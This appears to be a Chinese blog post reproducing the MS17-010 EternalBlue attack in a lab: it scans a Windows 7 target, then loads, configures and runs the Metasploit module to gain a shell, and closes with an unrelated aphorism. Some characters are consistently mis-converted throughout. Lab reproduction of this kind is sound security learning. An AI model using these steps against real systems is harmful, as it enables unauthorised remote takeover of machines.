MS17-010漏洞利用復現

MS17-010漏洞利用復現

準備環境：

win7靶機 IP地址：172.16.15.118
Kali攻擊機 IP地址：172.16.15.50

首先咱們須要查看一下靶機是否開啓445端口

打開kali終端，輸入nmap 172.16.15.118 對靶機進行端口掃描

能夠看到445端口是開着的

接下來咱們輸入msfconsole命令進入Metasploit 工具加載攻擊模塊

進入工具後輸入search ms17-010命令 查看可用攻擊模塊

Check 參數爲Yes的模塊都是咱們可用使用的

加載攻擊模塊：

msf5 > use exploit/windows/smb/ms17_010_eternalblue

進入該模塊後咱們可用使用show options 來查看咱們須要設置哪些參數

Required 參數爲Yes的都是咱們須要設置具體值的

因爲RPORT默認是445端口因此咱們不進行任何設置

設置目標ip：set rhosts 172.16.15.118

進行攻擊：run命令或者exploit

等了一下子以後發現咱們已經成功獲取到目標靶機的shell了

今天的復現結果挺成功

最後讓我矯情一下：

沒有原則的妥協 會讓人覺得你沒主見 沒底線的原諒 會讓人覺得你是非不分 別人待你如何 每每都是你本身調教出來的結果